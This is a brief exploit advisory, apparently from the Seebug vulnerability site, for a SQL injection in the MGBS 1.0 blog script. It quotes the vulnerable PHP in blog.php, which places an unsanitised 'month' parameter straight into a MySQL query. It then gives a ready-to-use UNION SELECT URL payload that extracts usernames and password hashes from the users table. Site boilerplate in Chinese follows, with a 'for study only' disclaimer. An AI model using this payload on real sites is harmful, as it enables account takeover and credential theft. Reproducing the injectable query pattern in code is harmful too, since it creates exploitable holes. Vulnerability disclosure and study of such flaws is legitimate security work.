# MGBS 1.0 Remote SQL injection # Script url http://sourceforge.net/project/showfiles.php?group_id=193233 # Vulnerable code in blog.php <?php $month = $_GET['month']; $result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN"); ... # Admin hash exploit http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users/* # Bug discovered by The_HuliGun # Greetz to: forum.antichat.ru
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论